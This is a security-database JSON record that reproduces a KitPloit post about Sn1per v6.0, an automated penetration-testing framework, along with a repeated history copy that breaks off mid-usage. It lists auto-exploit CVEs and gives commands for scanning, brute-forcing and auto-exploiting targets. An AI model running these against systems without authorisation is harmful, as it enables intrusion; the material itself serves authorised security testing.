{"id": "KITPLOIT:8672599587089685905", "bulletinFamily": "tools", "title": "Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts", "description": "[  ](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [ automated scanner ](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [ penetration test ](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. \n\n \n** SN1PER PROFESSIONAL FEATURES: ** \n \n** Professional reporting interface ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n** Slideshow for all gathered screenshots ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n** Searchable and sortable DNS, IP and open port database ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n** Categorized host reports ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n** Quick links to online recon tools and Google hacking queries ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n** Personalized notes field for each host ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n** DEMO VIDEO: ** \n[  ](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n** SN1PER COMMUNITY FEATURES: ** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.) \n * Automatically launches Google hacking queries against a target domain \n * Automatically enumerates open ports via NMap port scanning \n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers \n * Automatically checks for sub-domain hijacking \n * Automatically runs targeted NMap scripts against open ports \n * Automatically runs targeted Metasploit scan and exploit modules \n * Automatically scans all web applications for common vulnerabilities \n * Automatically brute forces ALL open services \n * Automatically test for anonymous FTP access \n * Automatically runs WPScan, Arachni and Nikto for all web services \n * Automatically enumerates NFS shares \n * Automatically test for anonymous LDAP access \n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities \n * Automatically enumerate SNMP community strings, services and users \n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 \n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers \n * Automatically tests for open X11 servers \n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds \n * Performs high level enumeration of multiple hosts and subnets \n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting \n * Automatically gathers screenshots of all web sites \n * Create individual workspaces to store all scan output \n \n** AUTO-PWN: ** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600 \n * GPON Router RCE CVE-2018-10561 \n * [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638 \n * Apache Struts 2 RCE CVE-2017-9805 \n * Apache Jakarta RCE CVE-2017-5638 \n * Shellshock GNU Bash RCE CVE-2014-6271 \n * HeartBleed OpenSSL Detection CVE-2014-0160 \n * Default Apache Tomcat Creds CVE-2009-3843 \n * MS Windows SMB RCE MS08-067 \n * Webmin File Disclosure CVE-2006-3392 \n * [ Anonymous FTP ](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access \n * PHPMyAdmin Backdoor RCE \n * PHPMyAdmin Auth Bypass \n * JBoss Java De-Serialization RCE's \n \n** KALI LINUX INSTALL: ** \n\n \n \n ./install.sh\n\n \n** DOCKER INSTALL: ** \nCredits: @menzow \nDocker Install: [ https://github.com/menzow/sn1per-docker ](<https://github.com/menzow/sn1per-docker>) \nDocker Build: [ https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/ ](<https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/>) \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n** USAGE: ** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n** MODES: ** \n\n\n * ** NORMAL: ** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. \n * ** STEALTH: ** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. \n * ** AIRSTRIKE: ** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. \n * ** NUKE: ** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. \n * ** DISCOVER: ** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. \n * ** PORT: ** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. \n * ** FULLPORTONLY: ** Performs a full detailed port scan and saves results to XML. \n * ** WEB: ** Adds full automatic web application scans to the results (port 80/tcp &amp; 443/tcp only). Ideal for web applications but may increase scan time significantly. \n * ** WEBPORTHTTP: ** Launches a full HTTP web application scan against a specific host and port. \n * ** WEBPORTHTTPS: ** Launches a full HTTPS web application scan against a specific host and port. \n * ** UPDATE: ** Checks for updates and upgrades all components used by sniper. \n * ** REIMPORT: ** Reimport all workspace files into Metasploit and reproduce all reports. \n * ** RELOAD: ** Reload the master workspace report. \n \n** SAMPLE REPORT: ** \n[ https://gist.github.com/1N3/8214ec2da2c91691bcbc ](<https://gist.github.com/1N3/8214ec2da2c91691bcbc>) \n \n \n\n\n** [ Download Sn1per v5.0 ](<https://github.com/1N3/Sn1per>) **\n", "published": "2018-11-24T12:43:00", "modified": "2018-11-24T12:43:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://www.kitploit.com/2018/11/sn1per-v60-automated-pentest-framework.html", "reporter": "KitPloit", "references": ["https://gist.github.com/1N3/8214ec2da2c91691bcbc", "https://github.com/menzow/sn1per-docker", "https://github.com/1N3/Sn1per"], "cvelist": ["CVE-2018-7600", "CVE-2006-3392", "CVE-2009-3843", "CVE-2018-10561", "CVE-2017-5638", "CVE-2014-0160", "CVE-2017-9805", "CVE-2014-6271"], "type": "kitploit", "lastseen": "2020-04-07T04:42:36", "history": [{"bulletin": {"bulletinFamily": "tools", "cvelist": ["CVE-2018-7600", "CVE-2006-3392", "CVE-2009-3843", "CVE-2018-10561", "CVE-2019-15126", "CVE-2017-5638", "CVE-2020-0796", "CVE-2014-0160", "CVE-2017-9805", "CVE-2014-6271"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "description": "[  ](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [ automated scanner ](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [ penetration test ](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. \n\n \n** SN1PER PROFESSIONAL FEATURES: ** \n \n** Professional reporting interface ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n** Slideshow for all gathered screenshots ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n** Searchable and sortable DNS, IP and open port database ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n** Categorized host reports ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n** Quick links to online recon tools and Google hacking queries ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n** Personalized notes field for each host ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n** DEMO VIDEO: ** \n[  ](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n** SN1PER COMMUNITY FEATURES: ** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.) \n * Automatically launches Google hacking queries against a target domain \n * Automatically enumerates open ports via NMap port scanning \n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers \n * Automatically checks for sub-domain hijacking \n * Automatically runs targeted NMap scripts against open ports \n * Automatically runs targeted Metasploit scan and exploit modules \n * Automatically scans all web applications for common vulnerabilities \n * Automatically brute forces ALL open services \n * Automatically test for anonymous FTP access \n * Automatically runs WPScan, Arachni and Nikto for all web services \n * Automatically enumerates NFS shares \n * Automatically test for anonymous LDAP access \n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities \n * Automatically enumerate SNMP community strings, services and users \n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 \n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers \n * Automatically tests for open X11 servers \n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds \n * Performs high level enumeration of multiple hosts and subnets \n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting \n * Automatically gathers screenshots of all web sites \n * Create individual workspaces to store all scan output \n \n** AUTO-PWN: ** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600 \n * GPON Router RCE CVE-2018-10561 \n * [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638 \n * Apache Struts 2 RCE CVE-2017-9805 \n * Apache Jakarta RCE CVE-2017-5638 \n * Shellshock GNU Bash RCE CVE-2014-6271 \n * HeartBleed OpenSSL Detection CVE-2014-0160 \n * Default Apache Tomcat Creds CVE-2009-3843 \n * MS Windows SMB RCE MS08-067 \n * Webmin File Disclosure CVE-2006-3392 \n * [ Anonymous FTP ](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access \n * PHPMyAdmin Backdoor RCE \n * PHPMyAdmin Auth Bypass \n * JBoss Java De-Serialization RCE's \n \n** KALI LINUX INSTALL: ** \n\n \n \n ./install.sh\n\n \n** DOCKER INSTALL: ** \nCredits: @menzow \nDocker Install: [ https://github.com/menzow/sn1per-docker ](<https://github.com/menzow/sn1per-docker>) \nDocker Build: [ https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/ ](<https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/>) \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n** USAGE: ** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n** MODES: ** \n\n\n * ** NORMAL: ** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. \n * ** STEALTH: ** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. \n * ** AIRSTRIKE: ** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. \n * ** NUKE: ** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. \n * ** DISCOVER: ** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. \n * ** PORT: ** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. \n * ** FULLPORTONLY: ** Performs a full detailed port scan and saves results to XML. \n * ** WEB: ** Adds full automatic web application scans to the results (port 80/tcp &amp; 443/tcp only). Ideal for web applications but may increase scan time significantly. \n * ** WEBPORTHTTP: ** Launches a full HTTP web application scan against a specific host and port. \n * ** WEBPORTHTTPS: ** Launches a full HTTPS web application scan against a specific host and port. \n * ** UPDATE: ** Checks for updates and upgrades all components used by sniper. \n * ** REIMPORT: ** Reimport all workspace files into Metasploit and reproduce all reports. \n * ** RELOAD: ** Reload the master workspace report. \n \n** SAMPLE REPORT: ** \n[ https://gist.github.com/1N3/8214ec2da2c91691bcbc ](<https://gist.github.com/1N3/8214ec2da2c91691bcbc>) \n \n \n\n\n** [ Download Sn1per v5.0 ](<https://github.com/1N3/Sn1per>) **\n", "edition": 13, "enchantments": {"dependencies": {"modified": "2020-04-02T10:53:08", "references": [{"idList": ["IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD"], "type": "impervablog"}, {"idList": ["QUALYSBLOG:016288CBC518BC4CE318130A921071C2", "QUALYSBLOG:22A5C3C4F56D3B499B24DF2E1626F4C1"], "type": "qualysblog"}, {"idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350", "CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940", "CFOUNDRY:3B3A927B1B8E5A80A8EA38A6AACF98EE", "CFOUNDRY:13948A26B0F4A736B03310A8560A6F73"], "type": "cloudfoundry"}, {"idList": ["THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:477B6029652B76463B5C5B7155CDF736"], "type": "threatpost"}, {"idList": ["ATLASSIAN:CWD-4879", "ATLASSIAN:BAM-18242"], "type": "atlassian"}, {"idList": ["TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"], "type": "talosblog"}, {"idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"], "type": "rapid7community"}, {"idList": ["CARBONBLACK:6D8B0D86C2C5A86632676E10E471547F"], "type": "carbonblack"}, {"idList": ["SECURITYVULNS:DOC:30472", "SECURITYVULNS:DOC:31102", "SECURITYVULNS:DOC:31103"], "type": "securityvulns"}, {"idList": ["PENTESTIT:37744BAB82BC3A7B208CCD4945FA50F7"], "type": "pentestit"}, {"idList": ["PAN-SA-2014-0004"], "type": "paloalto"}, {"idList": ["THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:6C0E5E35ABB362C8EA341381B3DD76D6"], "type": "thn"}, {"idList": ["SMNTC-70103"], "type": "symantec"}, {"idList": ["SSV:92804", "SSV:92746", "SSV:97207", "SSV:96420"], "type": "seebug"}, {"idList": ["KITPLOIT:8800200070735873517", "KITPLOIT:2304674796555328667", "KITPLOIT:7942195329946074809", "KITPLOIT:395217029864187486", "KITPLOIT:1841841790447853746", "KITPLOIT:5857572574369273543", "KITPLOIT:9079806502812490909", "KITPLOIT:7013881512724945934", "KITPLOIT:7720212798779518234", "KITPLOIT:7835941952769002973"], "type": "kitploit"}, {"idList": ["CVE-2018-7600", "CVE-2006-3392", "CVE-2009-3843", "CVE-2018-10561", "CVE-2019-15126", "CVE-2017-5638", "CVE-2020-0796", "CVE-2014-0160", "CVE-2017-9805", "CVE-2014-6271"], "type": "cve"}, {"idList": ["F5:K15159", "F5:K84144321", "F5:K22854260", "SOL15159", "F5:K43451236"], "type": "f5"}, {"idList": ["SMB_NT_MS20_MAR_4551762.NASL", "SMB_MICROSOFT_WINDOWS_ADV200005_REMOTE.NASL"], "type": "nessus"}, {"idList": ["MYHACK58:62201784026"], "type": "myhack58"}, {"idList": ["OPENSSL:CVE-2014-0160"], "type": "openssl"}]}, "score": {"modified": "2020-04-02T10:53:08", "value": 5.5, "vector": "NONE"}}, "hash": "405aa4254ef91870d7ea6d1064740cfcfaf7d5f3995abc38e1b462dda97f61f7", "hashmap": [{"hash": "41cf64167afe5858b5f643ae278109ca", "key": "published"}, {"hash": "caff5b0471f8602f0978ae3194397164", "key": "cvelist"}, {"hash": "48ff728472335fc1adde286a415655a6", "key": "references"}, {"hash": "aba454e3574969396c0dddcb45011dcc", "key": "reporter"}, {"hash": "156b5913dcc72ba0ca7e1f3b8aa72160", "key": "title"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "4a931512ce65bdc9ca6808adf92d8783", "key": "bulletinFamily"}, {"hash": "4553be2119d862322dd6fec6bb385401", "key": "type"}, {"hash": "8ffa366cbd9d8b2265aeb64b6500604e", "key": "toolHref"}, {"hash": "0850c3f2e8d5b0e199adc0da59e44c2f", "key": "href"}, {"hash": "77fa4edd351d89b8a22c92e8bc699f5b", "key": "description"}, {"hash": "41cf64167afe5858b5f643ae278109ca", "key": "modified"}], "history": [], "href": "http://www.kitploit.com/2018/11/sn1per-v60-automated-pentest-framework.html", "id": "KITPLOIT:8672599587089685905", "lastseen": "2020-04-02T10:53:08", "modified": "2018-11-24T12:43:00", "objectVersion": "1.3", "published": "2018-11-24T12:43:00", "references": ["https://gist.github.com/1N3/8214ec2da2c91691bcbc", "https://github.com/menzow/sn1per-docker", "https://github.com/1N3/Sn1per"], "reporter": "KitPloit", "title": "Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts", "toolHref": "https://github.com/1N3/Sn1per", "type": "kitploit", "viewCount": 512}, "differentElements": ["cvelist"], "edition": 13, "lastseen": "2020-04-02T10:53:08"}, {"bulletin": {"bulletinFamily": "tools", "cvelist": ["CVE-2018-7600", "CVE-2006-3392", "CVE-2009-3843", "CVE-2018-10561", "CVE-2017-5638", "CVE-2014-0160", "CVE-2017-9805", "CVE-2014-6271"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "description": "[  ](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [ automated scanner ](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [ penetration test ](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. \n\n \n** SN1PER PROFESSIONAL FEATURES: ** \n \n** Professional reporting interface ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n** Slideshow for all gathered screenshots ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n** Searchable and sortable DNS, IP and open port database ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n** Categorized host reports ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n** Quick links to online recon tools and Google hacking queries ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n** Personalized notes field for each host ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n** DEMO VIDEO: ** \n[  ](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n** SN1PER COMMUNITY FEATURES: ** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.) \n * Automatically launches Google hacking queries against a target domain \n * Automatically enumerates open ports via NMap port scanning \n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers \n * Automatically checks for sub-domain hijacking \n * Automatically runs targeted NMap scripts against open ports \n * Automatically runs targeted Metasploit scan and exploit modules \n * Automatically scans all web applications for common vulnerabilities \n * Automatically brute forces ALL open services \n * Automatically test for anonymous FTP access \n * Automatically runs WPScan, Arachni and Nikto for all web services \n * Automatically enumerates NFS shares \n * Automatically test for anonymous LDAP access \n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities \n * Automatically enumerate SNMP community strings, services and users \n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 \n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers \n * Automatically tests for open X11 servers \n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds \n * Performs high level enumeration of multiple hosts and subnets \n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting \n * Automatically gathers screenshots of all web sites \n * Create individual workspaces to store all scan output \n \n** AUTO-PWN: ** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600 \n * GPON Router RCE CVE-2018-10561 \n * [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638 \n * Apache Struts 2 RCE CVE-2017-9805 \n * Apache Jakarta RCE CVE-2017-5638 \n * Shellshock GNU Bash RCE CVE-2014-6271 \n * HeartBleed OpenSSL Detection CVE-2014-0160 \n * Default Apache Tomcat Creds CVE-2009-3843 \n * MS Windows SMB RCE MS08-067 \n * Webmin File Disclosure CVE-2006-3392 \n * [ Anonymous FTP ](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access \n * PHPMyAdmin Backdoor RCE \n * PHPMyAdmin Auth Bypass \n * JBoss Java De-Serialization RCE's \n \n** KALI LINUX INSTALL: ** \n\n \n \n ./install.sh\n\n \n** DOCKER INSTALL: ** \nCredits: @menzow \nDocker Install: [ https://github.com/menzow/sn1per-docker ](<https://github.com/menzow/sn1per-docker>) \nDocker Build: [ https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/ ](<https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/>) \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n** USAGE: ** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w 